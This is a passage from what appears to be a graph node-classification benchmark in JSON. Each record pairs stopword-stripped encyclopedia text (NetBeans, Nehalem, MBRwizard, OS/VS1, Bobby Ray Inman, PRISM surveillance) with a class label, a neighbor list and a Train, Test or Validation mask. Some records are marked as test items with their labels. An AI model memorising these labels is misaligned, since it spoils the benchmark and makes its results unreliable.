    "text": "NetBeans:netbeans netbeans integrated development environment ide java netbeans allows applications developed set modular software components called modules netbeans runs windows macos linux solaris addition java development extensions languages like php c c++ html5 javascript applications based netbeans including netbeans ide extended third party developers netbeans began 1996 xelfi word play delphi java ide student project guidance faculty mathematics physics charles university prague 1997 roman staněk formed company around project produced commercial versions netbeans ide bought sun microsystems 1999 sun open-sourced netbeans ide june following year since netbeans community continued grow 2010 sun thus netbeans acquired oracle corporation oracle netbeans competed jdeveloper freeware ide historically product company september 2016 oracle submitted proposal donate netbeans project apache software foundation stating opening netbeans governance model give netbeans constituents greater voice project direction future success upcoming release java 9 netbeans 9 beyond move endorsed java creator james gosling project entered apache incubator october 2016 netbeans ide releases netbeans ide 6.0 introduced support developing ide modules rich client applications based netbeans platform java swing gui builder formerly known project matisse improved cvs support weblogic 9 jboss 4 support many editor enhancements netbeans 6 available official repositories major linux distributions netbeans ide 6.5 released november 2008 extended existing java ee features including java persistence support ejb 3 jax-ws additionally netbeans enterprise pack supports development java ee 5 enterprise applications including soa visual design tools xml schema tools web services orchestration bpel uml modeling netbeans ide bundle c/c++ supports c/c++ fortran development netbeans ide 6.8 first ide provide complete support java ee 6 glassfish enterprise server v3 developers hosting open-source projects kenai.com additionally benefit instant messaging issue tracking integration navigation right ide support web application development php 5.3 symfony framework improved code completion layouts hints navigation javafx projects netbeans ide 6.9 released june 2010 added support osgi spring framework 3.0 java ee dependency injection jsr-299 zend framework php easier code navigation overridden/implemented annotations formatting hints refactoring across several languages netbeans ide 7.0 released april 2011 august 1 2011 netbeans team released netbeans ide 7.0.1 full support official release java se 7 platform netbeans ide 7.3 released february 2013 added support html5 web technologies netbeans ide 7.4 released 15 october 2013 netbeans ide 8.0 released 18 march 2014 netbeans ide 8.1 released 4 november 2015 netbeans ide 8.2 released 3 october 2016 netbeans 9.0 adds support java 9 10 released 29 july 2018 apache incubator project netbeans 10.0 released 27 december 2018 brings support java 11 improved support php 7.0–7.3 netbeans 11.0 released 4 april 2019 netbeans 11.1 released 22 july 2019 netbeans platform framework simplifying development java swing desktop applications netbeans ide bundle java se contains needed start developing netbeans plugins netbeans platform based applications additional sdk required applications install modules dynamically application include update center module allow users application download digitally signed upgrades new features directly running application reinstalling upgrade new release force users download entire application platform offers reusable services common desktop applications allowing developers focus logic specific application among features platform showcase applications developed top netbeans platform available https //netbeans.org/features/platform/showcase.html netbeans ide open-source integrated development environment netbeans ide supports development java application types java se including javafx java web ejb mobile applications box among features ant-based project system maven support refactorings version control supporting cvs subversion git mercurial clearcase modularity functions ide provided modules module provides well-defined function support java language editing support cvs versioning system svn netbeans contains modules needed java development single download allowing user start working immediately modules also allow netbeans extended new features support programming languages added installing additional modules instance sun studio sun java studio enterprise sun java studio creator sun microsystems based netbeans ide license ide licensed apache license 2.0 previously july 2006 2007 netbeans ide licensed sun common development distribution license cddl license based mozilla public license mpl october 2007 sun announced netbeans would henceforth offered dual license cddl gpl version 2 licenses gpl linking exception gnu classpath oracle donated netbeans platform ide apache foundation underwent incubation graduated top level project april 2019 october 2016 interview gabriela motroc oracle vice president bill pataky stated oracle number products depend netbeans 2018 netbeans still apache incubator alternative netbeans distribution called coolbeans independently launched coolbeans offered installer windows native application macos included java development kit native modules system notifications well java enterprise modules modules part netbeans ide netbeans profiler tool monitoring java applications helps developers find memory leaks optimize speed formerly downloaded separately integrated core ide since version 6.0 profiler based sun laboratories research project named jfluid research uncovered specific techniques used lower overhead profiling java application one techniques dynamic bytecode instrumentation particularly useful profiling large java applications using dynamic bytecode instrumentation additional algorithms netbeans profiler able obtain runtime information applications large complex profilers netbeans also support profiling points let profile precise points execution measure execution time formerly known project matisse gui design-tool enables developers prototype design swing guis dragging positioning gui components gui builder built-in support jsr 295 beans binding technology support jsr 296 swing application framework removed 7.1 netbeans javascript editor provides extended support javascript ajax css javascript editor features comprise syntax highlighting refactoring code completion native objects functions generation javascript class skeletons generation ajax callbacks template automatic browser compatibility checks css editor features comprise code completion styles names quick navigation navigator panel displaying css rule declaration list view file structure tree view sorting outline view name type declaration order list tree creating rule declarations tree refactoring part rule name tree netbeans 7.4 later uses new nashorn javascript engine developed oracle users choose download netbeans ide bundles tailored specific development needs users also download install features later date directly netbeans ide netbeans ide bundle web java ee provides complete tools latest java ee 6 standards including new java ee 6 web profile enterprise java beans ejbs servlets java persistence api web services annotations netbeans also supports jsf 2.0 facelets javaserver pages jsp hibernate spring struts frameworks java ee 5 j2ee 1.4 platforms includes glassfish apache tomcat features javaee includes netbeans supports php since version 6.5 bundle php includes oracle also releases version netbeans includes features bundles bundle includes official ruby support removed release 7.0 netbeans ide translated following languages community translations ide also available following languages",
    "neighbors": [
      1539,
      9731,
      11271,
      6154,
      4107,
      9738,
      9229,
      7695,
      6161,
      10771,
      1047,
      8217,
      9245,
      5663,
      546,
      10789,
      11303,
      2605,
      5165,
      5677,
      564,
      1594,
      9789,
      7742,
      7233,
      7750,
      4171,
      1101,
      597,
      6231,
      10327,
      7261,
      11357,
      8799,
      2658,
      10851,
      10340,
      11363,
      8294,
      9831,
      9320,
      7785,
      8810,
      5233,
      2163,
      5747,
      9333,
      6774,
      631,
      1657,
      7293,
      9343,
      1668,
      645,
      10377,
      4235,
      6797,
      2191,
      2710,
      8860,
      10910,
      8353,
      8871,
      1707,
      3247,
      3761,
      690,
      6322,
      7346,
      4277,
      7355,
      190,
      10436,
      6341,
      1222,
      4294,
      5833,
      5323,
      8909,
      7374,
      3285,
      8408,
      219,
      1755,
      2269,
      10971,
      1250,
      9955,
      10470,
      8425,
      747,
      10478,
      10991,
      5872,
      11503,
      8434,
      4853,
      6910,
      3328,
      7430,
      1801,
      1802,
      8460,
      1296,
      1809,
      4885,
      8986,
      8994,
      1316,
      3877,
      303,
      1327,
      2864,
      7983,
      9008,
      9010,
      9012,
      823,
      2871,
      4919,
      5945,
      1851,
      1852,
      7479,
      7485,
      7486,
      10553,
      4419,
      8007,
      8524,
      847,
      2895,
      4944,
      6993,
      1363,
      10587,
      5471,
      4960,
      865,
      8545,
      1379,
      11111,
      8554,
      11626,
      7022,
      1399,
      3960,
      1913,
      11129,
      11135,
      3969,
      3462,
      9614,
      7567,
      6039,
      11161,
      6555,
      10143,
      7072,
      2465,
      10661,
      5047,
      4538,
      6074,
      5567,
      7104,
      9665,
      8644,
      1991,
      1480,
      11208,
      5066,
      5578,
      8139,
      10193,
      8147,
      10200,
      6107,
      9179,
      990,
      10719,
      3553,
      11235,
      3560,
      3561,
      3562,
      7147,
      7148,
      6640,
      8179,
      7159,
      1018,
      11259,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6339,
    "label": 3,
    "text": "Nehalem_(microarchitecture):nehalem microarchitecture nehalem codename intel processor microarchitecture released november 2008 nehalem used first generation intel core processors core i7 i5 core i3 based subsequent westmere sandy bridge designs nehalem successor older core microarchitecture intel core 2 processors intel codename nehalem taken nehalem river architecture differs radically netburst retaining latter minor features nehalem-based microprocessors use 45 nm process run higher clock speeds energy-efficient penryn microprocessors hyper-threading reintroduced along reduction l2 cache size well enlarged l3 cache shared among cores nehalem replaced sandy bridge microarchitecture released january 2011 reported nehalem focus performance thus increased core size compared penryn nehalem overclocking possible bloomfield processors x58 chipset lynnfield processors use pch removing need northbridge nehalem processors incorporate sse 4.2 simd instructions adding seven new instructions sse 4.1 set core 2 series nehalem architecture reduces atomic operation latency 50 attempt eliminate overhead atomic operations codice_1 compare-and-swap instruction successor nehalem westmere sandy bridge",
    "neighbors": [
      4108,
      9741,
      5649,
      27,
      6175,
      6181,
      8231,
      2088,
      7218,
      2638,
      4695,
      1119,
      3175,
      7783,
      4204,
      4717,
      8820,
      630,
      4217,
      1660,
      8325,
      7313,
      8851,
      6804,
      11417,
      9391,
      4276,
      2237,
      5309,
      6339,
      5844,
      3294,
      1260,
      5356,
      5871,
      3317,
      5883,
      5380,
      5386,
      5901,
      6926,
      4886,
      3352,
      10548,
      5444,
      9541,
      4444,
      8035,
      1915,
      5503,
      3459,
      3973,
      9095,
      9611,
      398,
      8590,
      5523,
      9111,
      10139,
      10669,
      9649,
      10675,
      1461,
      1463,
      8125,
      8126,
      1998,
      977,
      5073,
      2516,
      2525,
      7134,
      7653,
      1000,
      7657,
      9707,
      8684,
      10734,
      499,
      4603
    ],
    "mask": "None"
  },
  {
    "node_id": 6340,
    "label": 2,
    "text": "MBRwizard:mbrwizard mbrwizard master boot record mbr management application x86 x86-64 based computers use disk imaging applications backup operating system deployment began increase well many users beginning experiment dual-booting linux existing windows machines key entries mbr often changed corrupted rendering machine unbootable mbrwizard designed allow user reverse repair unwanted destructive changes mbr effectively enabling computer boot properly originally developed 1999 internal use continually updated eventually released freeware public march 2003 initial functionality designed sort partition table entries caused effects disk imaging quickly evolved include backup recovery entire mbr repair corrupt windows mbr record well direct modification disk signature additional functionality added allow partitions activated hidden deleted later options added include disk wipe functionality shutdown/reboot machine mount/dismount windows volumes staging byte utilized maintain status reboots designed cross-platform application beginning mbrwizard noted flexible implemented natively pc operating systems addition freeware mbrwizard cli version mbrwizard suite 3.0 released 2010 commercial product featuring new graphical interface ability create custom winpe boot environments offline repair recovery",
    "neighbors": [
      5356,
      5612,
      3250,
      499,
      9910,
      823,
      2811,
      6494
    ],
    "mask": "None"
  },
  {
    "node_id": 6341,
    "label": 7,
    "text": "RightNow_Technologies:rightnow technologies oracle rightnow customer relationship management crm software service enterprise organizations originally developed rightnow technologies inc. acquired oracle corporation 2011 company founded 1997 greg gianforte bozeman montana additional offices opened california new york new jersey massachusetts texas illinois washington dc colorado canada europe australia asia company employed 1000 people 2011 rightnow business model software service using cloud computing gianforte started company 1997 without external capital created software product initially focused customer service integrated knowledge base company grew added marketing sales functionality voice automation customer feedback management analytics social platform product creating full customer experience suite 2004 rightnow technologies raised 44.1m million successful ipo nasdaq exchange 2006 rightnow technologies acquired sfa company salesnet 2009 rightnow technologies acquired social networking company hivelive 2011 company acquired q-go 34 million q-go founded 1999 specialized semantic search service based natural language processing technology providing relevant answers queries company ’ internet website corporate intranet formulated natural sentences keyword input alike integrated automatic statistical reporting user query behavior businesses want monitor kinds questions customers asking adjust content provide appropriate information customers reduce load traditional customer service ports call call centers answers email technology implemented deployed range industries including banking insurance pension telecommunications logistics well several government agencies october 2011 oracle corporation announced intention acquire rightnow 1.5 billion deal completed january 2012 main product offered rightnow technologies rightnow cx customer experience suite rightnow cx divided rightnow web experience rightnow social experience rightnow contact center experience rightnow engage",
    "neighbors": [
      1539,
      8353,
      8994,
      8871,
      1707,
      5677,
      9010,
      9012,
      10553,
      1594,
      9665,
      6338,
      467,
      597,
      6107,
      1755,
      2269,
      1250,
      4194,
      7780,
      10340,
      7022,
      8046,
      8434,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 6342,
    "label": 2,
    "text": "OS/VS1:os/vs1 operating system/virtual storage 1 os/vs1 discontinued ibm mainframe computer operating system designed run ibm system/370 hardware successor multiprogramming fixed number tasks mft option system/360 operating system os/360 os/vs1 comparison predecessor supported virtual memory called virtual storage os/vs1 generally available 1970s 1980s longer supported ibm os/vs1 os/360 mft ii single virtual address space comparison os/vs2 svs os/360 mvt single virtual address space os/vs1 often installed mid-range ibm mainframe systems system/370 model 145 later system/370 model 148 os/vs1 intended manage medium-sized work load 1970s consisting batch processing applications running within fixed number operating system partitions via batch job management system job entry subsystem 1 jes1 contrast os/vs2 intended handle larger work loads consisting batch applications online interactive users using time sharing option tso combination however os/vs1 could often support interactive applications users running ibm cics transaction processing monitor job within one partitions installation modification os/vs1 accomplished via ibm cumbersome system generation sysgen process os/vs1 included replacement os/360 rje allowed submission retrieval jobs 2770 2780 3780 terminals workstation programs included os/vs1 e.g. 1130 res included remote terminal access method closer integration job management rje os/vs1 went seven product releases os/vs1 release 7 enhanced fourth release ibm os/vs1 basic programming extensions bpe product bpe provided support new 1980s hardware 3380 dasd disk last os/vs1 product release os/vs1 basic programming extensions bpe release 4 announced ibm 1983 general availability march 1984 product 5662-257 announcement letter 283-266 15 september 1983 ibm announced end functional enhancements os/vs1 1984 ibm recommended os/vs1 installations migrate mvs/370 mvs/xa assist migration mvs/xa ibm made vm/xa migration aid allowed installations run os/vs1 mvs/xa simultaneously machine guests third systemvm/xa way new mvs/xa system could tested old production os/vs1 system still use although ibm time sharing option tso required vs2 customers 370/145 370/148 time-sharing options. br one combination vm/cms time sharing guest machine running os/360 mft ii batch optional component os/360 mft ii os/360 mvt os/vs1 crje allowed user line-mode terminal edit text datasets submit jobs access job output non-ibm time-sharing product named tone tso-like vs1 vs one marketed tone software co",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      10508,
      7053,
      8077,
      9361,
      6675,
      9468,
      789,
      5397,
      9619,
      11539,
      11673,
      9370,
      6557,
      3359,
      10273,
      421,
      7848,
      6442,
      1323,
      7983,
      5936,
      7217,
      8879,
      9139,
      10803,
      6325,
      7477,
      4535,
      7733,
      8502,
      5562,
      10040,
      573,
      1219,
      964,
      8388,
      6342,
      11075,
      8136,
      8272,
      1235,
      7507,
      5336,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      6248,
      5492,
      375,
      2168,
      9977,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "Test"
  },
  {
    "node_id": 6343,
    "label": 4,
    "text": "Bobby_Ray_Inman:bobby ray inman bobby ray inman born april 4 1931 retired united states navy admiral held several influential positions united states intelligence community inman born raised community rhonesboro upshur county texas eastern portion state father owner operator gas station inman attended graduated mineola high school inman recalled 1986 5 4 tall weighed upon graduation tutored athletes admired high school keep bullied inman graduated mineola high school mineola texas age 15 1946 rode bus mineola tyler junior college member phi theta kappa national honor society graduated university texas degree history age 19 according budiansky joining naval reserve korean war inman rocketed ranks naval intelligence inman served director naval intelligence september 1974 july 1976 moved defense intelligence agency served vice director 1977 next became director national security agency inman held post 1981 last major position deputy director central intelligence post held february 12 1981 june 10 1982 simultaneously acting nsa director cia deputy director early 1981 modernized collection process setting joint facility college park maryland according budiansky inman sending memos back forth approving solutions 1976 martin hellman whitfield diffie published paper new directions cryptography introducing radically new method distributing cryptographic keys went far toward solving one fundamental problems cryptography key distribution become known diffie–hellman key exchange however hellman two graduate students attempted present work october 10 1977 international symposium information theory national security agency warned would legally equivalent exporting nuclear weapons hostile foreign power inman led nsa time feared encryption – far used military purposes – would used hostile foreign powers reducing ability nsa collect signals intelligence however hellman – anticipated increasing use electronic communications private sector transactions would require encryption – proceeded give talk defied nsa threat prosecution inman eventually realised hellman point prosecution hellman inman even became friends public key cryptography forms essential component internet security inman chaired commission improving security u.s. foreign installations marine barracks bombing april 1983 us embassy bombing beirut lebanon commission report influential setting security design standards u.s. embassies retirement navy chairman chief executive officer microelectronics computer technology corporation mcc austin texas four years chairman president chief executive officer westmark systems inc. privately owned electronics industry holding company three years admiral inman also served chairman federal reserve bank dallas 1987 1990 admiral inman ’ primary activity since 1990 investing start-up technology companies managing director limestone ventures member board directors several privately held companies serves trustee american assembly california institute technology elected fellow national academy public administration president clinton nominated secretary defense withdrew nomination see inman also board saic since 2001 inman held lbj centennial chair national policy university texas austin lyndon b. johnson school public affairs 2005 2009 school interim dean inman graduated texas bachelor history 1950 inman also served board directors council foreign relations dell computer sbc corporation massey energy 2011 became head board directors xe services formerly erik prince blackwater known academi 2013 sits board directors academi inman announced president bill clinton choice succeed les aspin secretary defense december 16 1993 initially receiving broad bipartisan support accepted post first withdrew nomination press conference january 18 1994 press conference inman made angry remarks comments new york times columnist william safire safire wrote paragraphs inman anti-israel bias shown ended four-point list negative qualifications reply inman suggested safire recruited senator bob dole kansas engage vitriolic attack inman also claimed dole senator trent lott planning turn heat nomination dole reaction state idea gotten bobby inman ... admiral inman letter n't make sense lott appeared even surprised saying floored inman bizarre press conference unnamed white house aide added us glued tube mouths open shock 1994 bobby ray inman requested withdrawn consideration defense secretary critics speculated decision motivated desire conceal links international signal control isc inman member board directors company allegedly either negligent approved illegal exports originally called esi electronic systems international company manufactured sub-assemblies agm-45 shrike rim-7 sea sparrow missiles 1974 vietnam war part standard arms contract us defense administration dcas company also commercial repair facility two meter portable amateur ham radios company new jersey called clegg manufactured communications helmet radios firemen electronic outdoor bug zappers isc involved two major indiscretions ceo james guerin received 15-year prison sentence 1984 1988 isc sent south africa 30 million military-related equipment including telemetry tracking antennae collect data missiles flight gyroscopes guidance systems photo-imaging film readers would form backbone medium-range missile system technology reportedly transferred iraq another link iraq supply specifications mk 20 rockeye ii cluster bomb chilean defense company cardoen industries able build almost identical weapon subsequently used coalition forces persian gulf war january–february 1991 2006 inman criticized bush administration use warrantless domestic wiretaps making one highest-ranking former intelligence officials criticize program public",
    "neighbors": [
      6017,
      1400,
      8726,
      2712,
      1189,
      3629,
      1838,
      9517,
      5308,
      1986,
      11335,
      6344,
      588,
      7119,
      7759,
      2897,
      3154,
      7887,
      8276,
      7893,
      991,
      7137,
      3941,
      3305,
      7145,
      4719,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6344,
    "label": 4,
    "text": "PRISM_(surveillance_program):prism surveillance program prism code name program united states national security agency nsa collects internet communications various u.s. internet companies program also known sigad prism collects stored internet communications based demands made internet companies google llc section 702 fisa amendments act 2008 turn data match court-approved search terms nsa use prism requests target communications encrypted traveled across internet backbone focus stored data telecommunication filtering systems discarded earlier get data easier handle among things prism began 2007 wake passage protect america act bush administration program operated supervision u.s. foreign intelligence surveillance court fisa court fisc pursuant foreign intelligence surveillance act fisa existence leaked six years later nsa contractor edward snowden warned extent mass data collection far greater public knew included characterized dangerous criminal activities disclosures published guardian washington post june 6 2013 subsequent documents demonstrated financial arrangement nsa special source operations division sso prism partners millions dollars documents indicate prism number one source raw intelligence used nsa analytic reports accounts 91 nsa internet traffic acquired fisa section 702 authority leaked information came light one day revelation fisa court ordering subsidiary telecommunications company verizon communications turn nsa logs tracking customers telephone calls u.s. government officials disputed aspects guardian washington post stories defended program asserting used domestic targets without warrant helped prevent acts terrorism receives independent oversight federal government executive judicial legislative branches june 19 2013 u.s. president barack obama visit germany stated nsa data gathering practices constitute circumscribed narrow system directed us able protect people prism publicly revealed classified documents program leaked journalists washington post guardian edward snowden time nsa contractor visit hong kong leaked documents included 41 powerpoint slides four published news articles documents identified several technology companies participants prism program including microsoft 2007 yahoo 2008 google 2009 facebook 2009 paltalk 2009 youtube 2010 aol 2011 skype 2011 apple 2012 speaker notes briefing document reviewed washington post indicated 98 percent prism production based yahoo google microsoft slide presentation stated much world electronic communications pass u.s. electronic communications data tend follow least expensive route rather physically direct route bulk world internet infrastructure based united states presentation noted facts provide united states intelligence analysts opportunities intercepting communications foreign targets electronic data pass united states snowden subsequent disclosures included statements government agencies united kingdom gchq also undertook mass interception tracking internet communications data described germany nightmarish true allegations nsa engaged dangerous criminal activity hacking civilian infrastructure networks countries universities hospitals private businesses alleged compliance offered limited restrictive effect mass data collection practices including americans since restrictions policy-based technically based change time adding additionally audits cursory incomplete easily fooled fake justifications numerous self-granted exceptions nsa policies encourage staff assume benefit doubt cases uncertainty number slides released edward snowden showing operation processes behind prism program faa referred section 702 fisa amendments act faa federal aviation administration widely known faa initialism french newspaper le monde disclosed new prism slides see page 4 7 8 coming prism/us-984xn overview presentation october 21 2013 british newspaper guardian disclosed new prism slides see pages 3 6 november 2013 one hand compares prism upstream program hand deals collaboration nsa threat operations center fbi wikimedia commons keeps copies leaked powerpoint slides along associated documents prism program special source operations sso division nsa tradition nsa intelligence alliances cooperates many 100 trusted u.s. companies since 1970s prior program terrorist surveillance program implemented wake september 11 attacks george w. bush administration widely criticized challenged illegal include warrants obtained foreign intelligence surveillance court prism authorized foreign intelligence surveillance court prism enabled president bush protect america act 2007 fisa amendments act 2008 immunizes private companies legal action cooperate u.s. government agencies intelligence collection 2012 act renewed congress president obama additional five years december 2017 according register fisa amendments act 2008 specifically authorizes intelligence agencies monitor phone email communications u.s. citizens week without obtaining warrant one parties outside u.s detailed description prism program found report nsa collection efforts section 702 faa released privacy civil liberties oversight board pclob july 2 2014 according report prism used collect internet communications telephone conversations internet communications collected bulk targeted way communications specific selectors like e-mail addresses gathered prism collection based upon keywords names actual collection process done data intercept technology unit ditu fbi behalf nsa sends selectors u.s. internet service providers previously served section 702 directive directive provider legally obliged hand ditu communications selectors provided government ditu sends communications nsa stored various databases depending type data content metadata already collected prism program may searched us non-us person identifiers kinds queries became known back-door searches conducted nsa fbi cia agencies slightly different protocols safeguards protect searches us person identifier internal nsa presentation slides included various media disclosures show nsa could unilaterally access data perform extensive in-depth surveillance live communications stored information examples including email video voice chat videos photos voice-over-ip chats skype file transfers social networking details snowden summarized general reality nsa fbi cia dia etc analyst access query raw sigint signals intelligence databases enter get results anything want according washington post intelligence analysts search prism data using terms intended identify suspicious communications targets analysts suspect least 51 percent confidence u.s. citizens process communication data u.s. citizens also collected unintentionally training materials analysts tell periodically report accidental collection non-foreign u.s. data nothing worry according guardian nsa access chats emails hotmail.com skype microsoft developed surveillance capability deal interception chats prism collection microsoft email services unaffected prism collects data prior encryption also according guardian glenn greenwald even low-level nsa analysts allowed search listen communications americans people without court approval supervision greenwald said low level analysts via systems like prism listen whatever emails want whatever telephone calls browsing histories microsoft word documents done need go court need even get supervisor approval part analyst added nsa databank years collected communications allows analysts search database listen calls read emails everything nsa stored look browsing histories google search terms 've entered also alerts activity people connected email address ip address future greenwald referring context foregoing quotes nsa program x-keyscore shortly publication reports guardian washington post united states director national intelligence james clapper june 7 2013 released statement confirming nearly six years government united states using large internet services companies facebook collect information foreigners outside united states defense national security threats statement read part guardian washington post articles refer collection communications pursuant section 702 foreign intelligence surveillance act contain numerous inaccuracies went say section 702 provision fisa designed facilitate acquisition foreign intelligence information concerning non-u.s. persons located outside united states used intentionally target u.s. citizen u.s. person anyone located within united states clapper concluded statement stating unauthorized disclosure information important entirely legal program reprehensible risks important protections security americans march 12 2013 clapper told united states senate select committee intelligence nsa wittingly collect type data millions hundreds millions americans clapper later admitted statement made march 12 2013 lie words responded thought truthful least untruthful manner saying june 7 2013 u.s. president barack obama referring prism program nsa telephone calls logging program said 've got two programs originally authorized congress repeatedly authorized congress bipartisan majorities approved congress continually briefed conducted whole range safeguards involved federal judges overseeing entire program throughout also said ca n't 100 percent security also 100 percent privacy zero inconvenience know 're going make choices society separate statements senior obama administration officials mentioned name source said congress briefed 13 times programs since 2009 june 8 2013 director national intelligence clapper made additional public statement prism released fact sheet providing information program described internal government computer system used facilitate government statutorily authorized collection foreign intelligence information electronic communication service providers court supervision authorized section 702 foreign intelligence surveillance act fisa 50 u.s.c § 1881a fact sheet stated surveillance activities published guardian washington post lawful conducted authorities widely known discussed fully debated authorized congress fact sheet also stated united states government unilaterally obtain information servers u.s. electronic communication service providers information obtained fisa court approval knowledge provider based upon written directive attorney general director national intelligence said attorney general provides fisa court rulings semi-annual reports prism activities congress provid ing unprecedented degree accountability transparency democratic senators udall wyden serve u.s. senate select committee intelligence subsequently criticized fact sheet inaccurate nsa director general keith alexander acknowledged errors stating fact sheet could precisely described requirements governing collection e-mail internet content us companies fact sheet withdrawn nsa website around june 26 closed-doors senate hearing around june 11 fbi director robert mueller said snowden leaks caused significant harm nation safety senate nsa director alexander defended program alexander defense immediately criticized senators udall wyden said saw evidence nsa programs produced uniquely valuable intelligence joint statement wrote gen alexander testimony yesterday suggested nsa bulk phone records collection program helped thwart 'dozens terrorist attacks plots mentioned appear identified using collection methods june 18 nsa director alexander said open hearing house intelligence committee congress communications surveillance helped prevent 50 potential terrorist attacks worldwide least 10 involving terrorism suspects targets united states 2001 2013 prism web traffic surveillance program contributed 90 percent cases according court records one example alexander gave regarding thwarted attack al qaeda new york stock exchange fact foiled surveillance several senators wrote director national intelligence clapper asking provide examples u.s. intelligence officials speaking condition anonymity told various news outlets june 24 already seeing said evidence suspected terrorists begun changing communication practices order evade detection surveillance tools disclosed snowden contrast swift forceful reactions previous day allegations government conducting surveillance united states citizens telephone records congressional leaders initially little say prism program day leaked information program published several lawmakers declined discuss prism citing top-secret classification others said aware program statements released president director national intelligence lawmakers began comment senator john mccain r-az senator dianne feinstein d-ca chair senate intelligence committee senator rand paul r-ky senator susan collins r-me member senate intelligence committee past member homeland security committee representative jim sensenbrenner r-wi principal sponsor patriot act representative mike rogers r-mi chairman permanent select committee intelligence senator mark udall d-co representative todd rokita r-in representative luis gutierrez d-il senator ron wyden d-or following statements lawmakers parties warned national security officials hearing house judiciary committee must change use sweeping national security agency surveillance programs face losing provisions foreign intelligence surveillance act allowed agency mass collection telephone metadata section 215 expires end 2015 unless realize 've got problem going renewed rep. jim sensenbrenner r-wis. author usa patriot act threatened hearing got changed 've got change operate section 215 otherwise two half years 're going anymore leaks classified documents pointed role special court enabling government secret surveillance programs members court maintained collaborating executive branch new york times however reported july 2013 dozen classified rulings nation surveillance court created secret body law giving national security agency power amass vast collections data americans pursuing terrorism suspects also people possibly involved nuclear proliferation espionage cyberattacks members u.s. congress pressed foreign intelligence surveillance court release declassified versions secret ruling court dismissed requests arguing decisions ca n't declassified contain classified information reggie walton current fisa presiding judge said statement perception court rubber stamp absolutely false rigorous review process applications submitted executive branch spearheaded initially five judicial branch lawyers national security experts judges ensure court authorizations comport applicable statutes authorize accusation rubber stamp rejected walton wrote letter senator patrick j. leahy annual statistics provided congress attorney general ... —frequently cited press reports suggestion court approval rate application 99 —reflect number final applications submitted acted court statistics reflect fact many applications altered prior final submission even withheld final submission entirely often indication judge would approve u.s. military acknowledged blocking access parts guardian website thousands defense personnel across country blocking entire guardian website personnel stationed throughout afghanistan middle east south asia spokesman said military filtering reports content relating government surveillance programs preserve network hygiene prevent classified material appearing unclassified parts computer systems access washington post also published information classified nsa surveillance programs disclosed edward snowden blocked time blocking access guardian reported former head austrian federal office protection constitution counterterrorism gert-rené polli stated knew prism program different name stated surveillance activities occurred austria well polli publicly stated 2009 received requests us intelligence agencies things would violation austrian law polli refused allow australian government said investigate impact prism program use pine gap surveillance facility privacy australian citizens australia former foreign minister bob carr said australians n't concerned prism cybersecurity high government list concerns australian foreign minister julie bishop stated acts edward snowden treachery offered staunch defence nation intelligence co-operation united states brazil president time dilma rousseff responded snowden reports nsa spied phone calls emails cancelling planned october 2013 state visit united states demanding official apology october 20 2013 n't come also rousseff classified spying unacceptable harsh words speech un general assembly september 24 2013 result boeing lost us 4.5 billion contract fighter jets sweden saab group canada national cryptologic agency communications security establishment cse said commenting prism would undermine cse ability carry mandate privacy commissioner jennifer stoddart lamented canada standards comes protecting personal online privacy stating fallen far behind report nations data protection authorities legal power make binding orders levy hefty fines take meaningful action event serious data breaches restricted 'soft approach persuasion encouragement potential publish names transgressors public interest push comes shove stoddart wrote short costly time-consuming court battle power enforce recommendations 20 october 2013 committee european parliament backed measure enacted would require american companies seek clearance european officials complying united states warrants seeking private data legislation consideration two years vote part efforts europe shield citizens online surveillance wake revelations far-reaching spying program u.s. national security agency germany france also ongoing mutual talks keep european email traffic going across american servers october 21 2013 french foreign minister laurent fabius summoned u.s ambassador charles rivkin quai d'orsay paris protest large-scale spying french citizens u.s. national security agency nsa paris prosecutors opened preliminary inquiries nsa program july fabius said ... obviously need go must quickly assure practices n't repeated germany receive raw prism data according reuters report german chancellor angela merkel said internet new us explain nature program matthew schofield mcclatchy washington bureau said roundly mocked statement gert-rené polli former austrian counter-terrorism official said 2013 absurd unnatural german authorities pretend known anything german army using prism support operations afghanistan early 2011 october 2013 reported nsa monitored merkel cell phone united states denied report following allegations merkel called president obama told spying friends never acceptable matter situation israeli newspaper calcalist discussed business insider article possible involvement technologies two secretive israeli companies prism program—verint systems narus finding prism program mexican government started constructing spying program spy citizens according jenaro villamil writer proceso cisen mexico intelligence agency started work ibm hewlett packard develop data gathering software facebook twitter emails social network sites going priority new zealand university otago information science associate professor hank wolfe said unofficially known five eyes alliance new zealand governments including united states australia canada britain dealt internal spying saying n't partners share information edward snowden live streamed google hangout kim dotcom julian assange alleged received intelligence new zealand nsa listening posts new zealand meeting european union leaders held week 21 october 2013 mariano rajoy spain prime minister said spying activities n't proper among partner countries allies 28 october 2013 spanish government summoned american ambassador james costos address allegations u.s. collected data 60 million telephone calls spain separately íñigo méndez de vigo spanish secretary state referred need maintain necessary balance security privacy concerns said recent allegations spying proven true improper unacceptable partners friendly countries united kingdom government communications headquarters gchq also surveillance program tempora access prism program june 2010 wrote 197 reports 2012 alone intelligence security committee uk parliament reviewed reports gchq produced basis intelligence sought us found case warrant interception place accordance legal safeguards contained uk law august 2013 guardian newspaper offices visited agents gchq ordered supervised destruction hard drives containing information acquired snowden original washington post guardian articles reporting prism noted one leaked briefing documents said prism involves collection data directly servers several major internet services providers corporate executives several companies identified leaked documents told guardian knowledge prism program particular also denied making information available government scale alleged news reports statements several companies named leaked documents reported techcrunch washington post follows response technology companies confirmation nsa able directly access companies servers new york times reported sources stated nsa gathering surveillance data companies using technical means response court orders specific sets data washington post suggested possible conflict prism slides company spokesmen result imprecision part nsa author another classified report obtained post arrangement described allowing 'collection managers send content tasking instructions directly equipment installed company-controlled locations rather directly company servers n context 'direct likely mean nsa receiving data sent deliberately tech companies opposed intercepting communications 're transmitted destination companies received order fisa amendments act forbidden law disclosing received order disclosing information order mark rumold staff attorney electronic frontier foundation told abc news may 28 2013 google ordered united states district court judge susan illston comply national security letter issued fbi provide user data without warrant kurt opsahl senior staff attorney electronic frontier foundation interview venturebeat said certainly appreciate google put transparency report appears transparency n't include would n't surprised subject gag order new york times reported june 7 2013 twitter declined make easier government companies compliant according people briefed negotiations companies held discussions national security personnel make data available efficiently securely cases companies made modifications systems support intelligence collection effort dialogues continued recent months general martin dempsey chairman joint chiefs staff met executives including facebook microsoft google intel details discussions provide insight disparity initial descriptions government program including training slide states collection directly servers companies denials providing data response legitimate fisa 